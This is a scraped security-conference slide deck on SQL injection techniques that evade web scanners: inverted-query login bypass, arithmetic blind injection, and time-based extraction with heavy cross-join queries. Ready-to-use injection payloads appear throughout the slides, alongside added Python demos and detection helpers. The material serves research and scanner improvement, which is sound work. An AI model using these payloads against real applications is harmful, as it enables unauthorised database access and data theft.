how "·$% developers defeat the web vulnerability scanners
![Page 1: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/1.jpg)
How ?¿$·& developers defeat the most famous web vulnerability scanners …or how to recognize old friends
Chema Alonso, Informática64
José Parada, Microsoft Ibérica
![Page 2: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/2.jpg)
Agenda
1.- Introduction
2.- Inverted Queries
3.- Arithmetic Blind SQL Injection
4.- Time-Based Blind SQL Injection using Heavy Queries
5.- Conclusions
![Page 3: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/3.jpg)
1.-Introduction
![Page 4: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/4.jpg)
SQL Injection is still here among us
![Page 5: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/5.jpg)
Web Application Security Consortium: Comparison
http://projects.webappsec.org/Web-Application-Security-Statistics
12,186 sites, 97,554 bugs
![Page 6: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/6.jpg)
Need to Improve Automatic Scanning
• Manual scanning is not always possible:
– Time
– Confidentiality
– Money, money, money…
• We need to study new ways of recognizing old-fashioned vulnerabilities in order to improve automatic scanning tools.
![Page 7: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/7.jpg)
2.-Inverted Queries
![Page 8: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/8.jpg)
![Page 9: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/9.jpg)
Homers, how are they?
• Lazy
• Badly trained
• Poor experience in security stuff
• Don't like working
• Don't like computing
• Don't like coding
• Don't like you!
![Page 10: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/10.jpg)
Flanders are Left-handed
![Page 11: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/11.jpg)
Right
SELECT UID
FROM USERS
WHERE NAME='V_NAME' AND PASSWORD='V_PASSW';
![Page 12: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/12.jpg)
Wrong?
SELECT UID
FROM USERS
WHERE 'V_NAME'=NAME AND 'V_PASSW'=PASSWORD
![Page 13: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/13.jpg)
Login Inverted Query
Select uid From users where 'v_name'=name and 'v_pass'=password
http://www.web.com/login.php?v_name=Robert&v_pass=Kubica' or '1'='1
Select uid From users where 'Robert'=name and 'Kubica' or '1'='1'=password -> FAIL
![Page 14: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/14.jpg)
Login Inverted SQL Injection: an example
Select uid From users where 'v_name'=name and 'v_pass'=password
http://www.web.com/login.php?v_name=Robert&v_pass='='' or '1'='1' or 'Kubica
Select uid From users where 'Robert'=name and ''='' or '1'='1' or 'Kubica'=password -> Success
![Page 15: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/15.jpg)
Blind Attacks
• The attacker injects code but cannot access the data directly.
• However, the injection changes the behavior of the web application.
• The attacker then looks for differences between true injections (1=1) and false injections (1=2) in the response pages in order to extract data.
– Blind SQL Injection
– Blind XPath Injection
– Blind LDAP Injection
![Page 16: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/16.jpg)
Blind SQL Injection Attacks
• The attacker injects:
– “True where clauses”
– “False where clauses”
– Ex:
• Program.php?id=1 and 1=1
• Program.php?id=1 and 1=2
• The program returns no visible data from the database, and no data in error messages.
• The attacker cannot see any data extracted from the database.
![Page 17: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/17.jpg)
Blind SQL Injection Attacks
• The attacker analyzes the response pages looking for differences between the “True-Answer Page” and the “False-Answer Page”:
– Different hashes
– Different HTML structure
– Different patterns (keywords)
– Different linear ASCII sums
– “Different behavior”, for example: response time
![Page 18: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/18.jpg)
Blind SQL Injection Attacks
• If any difference exists, then:
– The attacker can extract all the information in the database
– How? Using “booleanization”
• MySQL:
– Program.php?id=1 and 100>(ASCII(Substring(user(),1,1)))
» “True-Answer Page” or “False-Answer Page”?
• MSSQL:
– Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1)) from sysusers)
• Oracle:
– Program.php?id=1 and 100>(Select ASCII(Substr(username,1,1)) from all_users where rownum<=1)
![Page 19: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/19.jpg)
Blind Inverted Query
Select product From products Where v_value=id;
http://www.web.com/products.php?v_value=2 and 1=1
Select product From products Where 2 and 1=1=id; -> FAIL
![Page 20: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/20.jpg)
The MySQL Case
1 is True
1=1=1 -> True
1=1=(1+1-1)=abs(1)=1 -> True
2=2=2 -> False: 2=2 becomes True, so it is True=2; True equals 1, and 1=2 is False
Select product From products Where v_value=id;
http://www.web.com/products.php?v_value=1 and 1=1
Select product From products Where 1 and 1=1=id; -> SUCCESS (if there is an id=1)
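The two inverted-query cases above (the string login of slides 13-14 and the numeric product lookup of slides 19-20) replayed against SQLite, as an added example that is not part of the talk. SQLite shares the two MySQL properties the slides rely on (left-associative '=' and integers as booleans); the user and product rows are constructed, and safe_login is the parameterized form of the same lookup.

```python
import sqlite3

# Constructed sample rows (not from the talk); the slides only name "Robert Kubica".
USERS = [(1, "Robert", "Kubica"), (2, "Fernando", "Alonso")]
PRODUCTS = [(1, "helmet"), (2, "gloves"), (3, "boots")]


def open_db():
    """In-memory SQLite database standing in for the MySQL backend of the slides.
    SQLite shares the two properties the reasoning relies on: '=' is
    left-associative (1=1=id parses as (1=1)=id) and integers act as booleans."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (uid INTEGER, name TEXT, password TEXT)")
    db.execute("CREATE TABLE products (id INTEGER, product TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    db.executemany("INSERT INTO products VALUES (?, ?)", PRODUCTS)
    return db


def inverted_login(db, v_name, v_pass):
    """The 'Flanders' login of slide 13: literal on the left, column on the right,
    assembled by string concatenation, which is the defect the talk describes."""
    sql = f"SELECT uid FROM users WHERE '{v_name}'=name AND '{v_pass}'=password"
    return [row[0] for row in db.execute(sql)]


def inverted_products(db, v_value):
    """The numeric inverted query of slides 19-20: WHERE v_value=id."""
    return [row[0] for row in db.execute(f"SELECT product FROM products WHERE {v_value}=id")]


def safe_login(db, v_name, v_pass):
    """Hardened form: bound parameters, so operand order is irrelevant and the
    input is never parsed as SQL (a real application would also hash passwords)."""
    sql = "SELECT uid FROM users WHERE name=? AND password=?"
    return [row[0] for row in db.execute(sql, (v_name, v_pass))]


# Slide 13: the textbook probe turns the WHERE clause into
#   'Robert'=name AND 'Kubica' OR '1'='1'=password
# which groups as ('Robert'=name AND 'Kubica') OR (('1'='1')=password): both halves are false.
CLASSIC_PROBE = "Kubica' or '1'='1"
# Slide 14: the probe written for the inverted layout turns it into
#   'Robert'=name AND ''='' OR '1'='1' OR 'Kubica'=password, which is always true.
INVERTED_PROBE = "'='' or '1'='1' or 'Kubica"


def string_probe_results(db):
    """Which probes return a uid against the inverted login versus the safe one."""
    return {
        "classic/inverted": inverted_login(db, "Robert", CLASSIC_PROBE),
        "adapted/inverted": inverted_login(db, "Robert", INVERTED_PROBE),
        "adapted/safe": safe_login(db, "Robert", INVERTED_PROBE),
    }


def numeric_probe_results(db):
    """Baseline and boolean probes against WHERE v_value=id. With v_value=2 the
    'and 1=1' probe parses as 2 AND (1=id) and no longer matches the baseline
    page, so a scanner that expects the true probe to equal the baseline reports
    nothing; the same probes built on v_value=1 behave as the scanner expects."""
    return {
        "2": inverted_products(db, "2"),
        "2 and 1=1": inverted_products(db, "2 and 1=1"),
        "2 and 1=2": inverted_products(db, "2 and 1=2"),
        "1": inverted_products(db, "1"),
        "1 and 1=1": inverted_products(db, "1 and 1=1"),
        "1 and 1=2": inverted_products(db, "1 and 1=2"),
    }
```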
![Page 21: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/21.jpg)
Web Scanner behaviors
• Acunetix
• Paros
• AppScan
• W3af
• Wapiti
• Proxy Strike
![Page 22: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/22.jpg)
Acunetix & Homer
![Page 23: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/23.jpg)
Acunetix & Flanders
![Page 24: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/24.jpg)
AppScan & Homer
![Page 25: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/25.jpg)
AppScan & Flanders
![Page 26: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/26.jpg)
Paros & Homer
![Page 27: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/27.jpg)
Paros & Flanders
![Page 28: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/28.jpg)
W3af & Homer
![Page 29: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/29.jpg)
W3af & Flanders
![Page 30: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/30.jpg)
Wapiti & Homer
![Page 31: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/31.jpg)
Wapiti & Flanders
![Page 32: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/32.jpg)
Demo
• W3af
• Wapiti
• Proxy Strike
![Page 33: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/33.jpg)
Results
Scanners tested: Paros, AppScan, Acunetix, w3af, wapiti, Proxy Strike
Cases: Normal query and Inverted query, each on MySQL and MS SQL Server, each with a Numeric and a String parameter
![Page 34: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/34.jpg)
In the end…
OUCH!!! Thank God for keeping me safe
![Page 35: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/35.jpg)
Solutions?
• Concat string injection
• Arithmetic Blind SQL Injection
• Time-Based Blind SQL Injection
– Delay functions
– Heavy queries
![Page 36: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/36.jpg)
3.- Arithmetic
![Page 37: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/37.jpg)
What about these queries?
• How to detect/exploit this Blind SQL Injection vulnerability?
– The query forces the parameter to be numeric
– SELECT field FROM table WHERE id=abs(param)
– Ex:
Get Param(ID)
Select ….. Where att1=abs(ID)
Select ….. Where att2=k1-ID
Print response
• No AND or OR operators can be used.
• Boolean logic needs to be created with math operations.
![Page 38: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/38.jpg)
Arithmetic Blind SQL Injection
• Divide by zero (David Litchfield)
– Id=A+(1/(ASCII(B)-C))
• A -> Param value originally used in the query.
• B -> Value we are searching for, e.g.: Substring(passwd,1,1)
• C -> Counter [0..255]
– TRUE: When ASCII(B)=C, the DB will generate a divide-by-zero exception.
![Page 39: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/39.jpg)
Arithmetic Blind SQL Injection
• Sums and subtractions
– Id=A+ASCII(B)-C
• A -> Param value originally used in the query.
• B -> Value we are searching for, e.g.: Substring(passwd,1,1)
• C -> Counter [0..255]
– When ASCII(B)=C, the response page for id=A+ASCII(B)-C will be the same as for id=A
![Page 40: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/40.jpg)
Arithmetic Blind SQL Injection
• Value type overflow
– Id=A+((C/ASCII(B))*(K))
• A -> Param value originally used in the query.
• B -> Value we are searching for, e.g.: Substring(passwd,1,1)
• C -> Counter [0..255]
• K -> Value that overflows the type defined for A
– (e.g. if A is an integer, then K=2^32)
– When C/ASCII(B)==1, K*1 overflows the data type
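An added example, not from the talk or the Marathon tool: the three arithmetic payload shapes above, plus the classic "and 1=1" probe, are run through a keyword-style filter (AND/OR, quotes, comment markers) and through strict integer validation, over constructed access-log lines. It shows why a filter keyed on AND/OR misses arithmetic injection in a "forced numeric" parameter, why abs() in the SQL text does not help, and that allow-list validation catches all of them.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (not from the talk). Lines 3-5 carry the three
# arithmetic shapes of slides 38-40 (divide by zero, sum/subtraction, type
# overflow) with A=7, C=65, B=substring(passwd,1,1); line 2 is the classic
# boolean probe of slide 16; line 1 is a legitimate request.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /program.php?id=7 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /program.php?id=7+and+1%3D1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /program.php?id=7%2B(1/(ASCII(substring(passwd,1,1))-65)) HTTP/1.1" 500 0
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /program.php?id=7%2BASCII(substring(passwd,1,1))-65 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /program.php?id=7%2B((65/ASCII(substring(passwd,1,1)))*4294967296) HTTP/1.1" 500 0
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# A keyword blocklist of the kind a naive filter or scanner signature uses:
# it keys on AND/OR, single quotes and comment or statement terminators.
KEYWORD_RE = re.compile(r"\b(?:and|or)\b|'|--|;", re.IGNORECASE)
NUMERIC_PARAMS = {"id"}  # parameters the application treats as numeric


def request_params(line):
    """Decoded query parameters of one access-log line (first value per name)."""
    m = REQUEST_RE.search(line)
    if not m:
        return {}
    return {k: v[0] for k, v in parse_qs(urlsplit(m.group(1)).query).items()}


def keyword_filter_flags(value):
    """True when the naive keyword blocklist would reject the value."""
    return KEYWORD_RE.search(value) is not None


def parse_numeric_param(value):
    """Allow-list validation: a numeric parameter must be a plain integer.
    Wrapping the value in abs() inside the SQL text, as in the slides, does not
    help, because the injected arithmetic is parsed before abs() ever runs."""
    if re.fullmatch(r"-?\d+", value) is None:
        raise ValueError(f"non-numeric value for numeric parameter: {value!r}")
    return int(value)


def allow_list_flags(value):
    """True when strict integer validation would reject the value."""
    try:
        parse_numeric_param(value)
    except ValueError:
        return True
    return False


def audit(log_text):
    """(line number, value, flagged by keyword filter, flagged by allow-list)
    for every numeric parameter seen in the log."""
    report = []
    for n, line in enumerate(log_text.splitlines(), 1):
        for name, value in request_params(line).items():
            if name in NUMERIC_PARAMS:
                report.append((n, value, keyword_filter_flags(value), allow_list_flags(value)))
    return report


def missed_by_keyword_filter(log_text):
    """Line numbers the allow-list rejects but the keyword filter lets through."""
    return [n for n, _, kw, al in audit(log_text) if al and not kw]
```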
![Page 41: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/41.jpg)
Demo:
• Divide by zero
• Sums and subtractions
• Integer overflow
![Page 42: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/42.jpg)
Conclusions
• Arithmetic Blind SQL Injection makes it possible to build binary logic without “AND” and “OR”.
– It detects bugs in this kind of query…
– And also in inverted queries in which a numeric value is used
• Almost none of the vulnerability scanners use this method
![Page 43: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/43.jpg)
4.-Time-based Blind SQL Injection using heavy queries
![Page 44: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/44.jpg)
Time-Based Blind SQL Injection
• In scenarios with no differences between the “True-Answer Page” and the “False-Answer Page”, time delays can be used.
• The injection forces a delay in the response page when the injected condition is True.
– Delay functions:
• SQL Server: waitfor
• Oracle: dbms_lock.sleep
• MySQL: sleep or Benchmark function
• Postgres: pg_sleep
– Ex:
• ; if (exists(select * from users)) waitfor delay '0:0:5'
![Page 45: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/45.jpg)
Time-Based Blind SQL Injection
What about DBs without delay functions, i.e.:
– Oracle connections without PL/SQL injection
– MS Access
– DB2
Can we still exploit Time-Based Blind SQL Injection in these cases?
![Page 46: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/46.jpg)
![Page 47: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/47.jpg)
“Where-Clause” execution order
Select “whatever” From whatever Where condition1 and condition2
- Condition1 lasts 10 seconds
- Condition2 lasts 100 seconds
Which condition should be executed first?
![Page 48: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/48.jpg)
The heavy condition first

| Condition2 (100 sec) | Condition1 (10 sec) | Condition2 & Condition1 | Response Time |
|---|---|---|---|
| TRUE | FALSE | FALSE | 110 sec |
| TRUE | TRUE | TRUE | 110 sec |
| FALSE | Not evaluated | FALSE | 100 sec |
![Page 49: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/49.jpg)
The light condition first

| Condition1 (10 sec) | Condition2 (100 sec) | Condition1 & Condition2 | Response Time |
|---|---|---|---|
| TRUE | FALSE | FALSE | 110 sec |
| TRUE | TRUE | TRUE | 110 sec |
| FALSE | Not evaluated | FALSE | 10 sec |
![Page 50: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/50.jpg)
Time-Based Blind SQL Injection using Heavy Queries
• The attacker can exploit the injection by delaying the “True-answer page” with a heavy query.
• It depends on how the database engine evaluates the where clauses in the query.
• There are two types of database engines:
– Databases without an optimization process
– Databases with an optimization process
![Page 51: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/51.jpg)
Time-Based Blind SQL Injection using Heavy Queries
• The attacker can inject a heavy cross-join condition to delay the response page in true injections.
• The cross-join injection must be heavier than the other condition.
• The attacker only has to know, or guess, the name of a table with select permission in the database.
• Example in MSSQL:
– Program.php?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)
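An added triage helper, not from the talk or the Marathon tool: it takes the MSSQL payload above as it would appear in a captured query text, pulls out every FROM list (subqueries included), counts how many times sysusers is cross-joined with itself, and estimates the fan-out from assumed row counts. That fan-out, rather than any keyword, is what a slow-query-log rule for this technique keys on; the row estimates and the ordinary comparison query are constructed.

```python
import re
from collections import Counter

# Slide 51's MS SQL Server payload as captured query text (the page's own
# example), next to a constructed ordinary query for comparison.
HEAVY_QUERY = (
    "SELECT product FROM products WHERE id=1 and (SELECT count(*) FROM sysusers "
    "AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, "
    "sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 "
    "and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)"
)
NORMAL_QUERY = "SELECT product FROM products WHERE id=1"

# Assumed row counts per table (constructed; take them from your own catalog).
ROW_ESTIMATES = {"products": 500, "sysusers": 30}

# A FROM list runs up to the next WHERE, a closing parenthesis or end of text.
FROM_LIST_RE = re.compile(r"\bFROM\s+(.+?)(?=\s+WHERE\b|\)|$)", re.IGNORECASE | re.DOTALL)


def from_lists(sql):
    """Every comma-separated FROM list in the statement, subqueries included."""
    return [m.group(1) for m in FROM_LIST_RE.finditer(sql)]


def table_counts(from_list):
    """How many times each table name appears in one FROM list (aliases dropped)."""
    names = [item.strip().split()[0].lower() for item in from_list.split(",") if item.strip()]
    return Counter(names)


def max_self_join_degree(sql):
    """Largest number of times one table is listed in a single FROM list."""
    return max((max(table_counts(fl).values()) for fl in from_lists(sql)), default=0)


def worst_cross_join_fanout(sql, row_estimates=ROW_ESTIMATES):
    """Largest estimated row product over any single FROM list: listing sysusers
    eight times without a join predicate costs rows(sysusers)**8 combinations,
    which is where the 14 to 39 second responses of the next slides come from."""
    worst = 1
    for fl in from_lists(sql):
        estimate = 1
        for name, n in table_counts(fl).items():
            estimate *= row_estimates.get(name, 1000) ** n
        worst = max(worst, estimate)
    return worst


def is_heavy_query(sql, row_estimates=ROW_ESTIMATES, threshold=10**9):
    """Slow-query-log triage rule: flag statements whose estimated fan-out is
    far beyond anything the application's own queries would produce."""
    return worst_cross_join_fanout(sql, row_estimates) >= threshold
```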
![Page 52: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/52.jpg)
“Default” tables to construct a heavy query
– Microsoft SQL Server
• sysusers
– Oracle
• all_users
– MySQL (version 5)
• information_schema.columns
– Microsoft Access
• MSysAccessObjects (97 & 2000 versions)
• MSysAccessStorage (2003 & 2007)
![Page 53: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/53.jpg)
“Default” tables to construct a heavy query
• …or whatever you can guess
– Clients
– Customers
– News
– Logins
– Users
– Providers
– …
Use your imagination…
![Page 54: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/54.jpg)
Ex 1: MS SQL Server
Query takes 14 seconds -> True-Answer
![Page 55: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/55.jpg)
Ex 1: MS SQL Server
Query takes 1 second -> False-Answer
![Page 56: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/56.jpg)
Ex 2: Oracle
Query Takes 22 seconds –> True-Answer
![Page 57: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/57.jpg)
Ex 2: Oracle
Query Takes 1 second –> False-Answer
![Page 58: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/58.jpg)
Ex 3: Access 2007
Query Takes 39 seconds –> True-Answer
![Page 59: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/59.jpg)
Ex 3: Access 2007
Query Takes 1 second –> False-Answer
![Page 60: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/60.jpg)
Marathon Tool
• Automates Time-Based Blind SQL Injection attacks using heavy queries in SQL Server, MySQL, MS Access and Oracle databases.
• Schema extraction from known databases
• Extracts data using heavy queries regardless of the database engine (without schema)
• Developed in .NET
• Source code available
• http://www.codeplex.com/marathontool
![Page 61: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/61.jpg)
Demo: Marathon Tool
![Page 62: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/62.jpg)
5.- Conclusions
![Page 63: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/63.jpg)
The real world has plenty of kinds of developers…
![Page 64: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/64.jpg)
References
• Inverted SQL queries (Spanish): http://elladodelmal.blogspot.com/2009/09/inverted-sql-queries-ii-de-ii.html
• Arithmetic Blind SQL Injection (Spanish): http://elladodelmal.blogspot.com/2009/07/arithmetic-blind-sql-injection-i-de-ii.html
• Time-Based Blind SQL Injection using heavy queries & Marathon Tool: http://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdf
• Marathon Tool: http://www.codeplex.com/marathontool
• Connection String Attacks (Spanish): http://www.slideshare.net/chemai64/connection-string-parameter-pollution
![Page 65: How "·$% developers defeat the web vulnerability scanners](https://reader036.vdocuments.us/reader036/viewer/2022081515/556208a5d8b42a7d028b4885/html5/thumbnails/65.jpg)
Don't complain about your job!!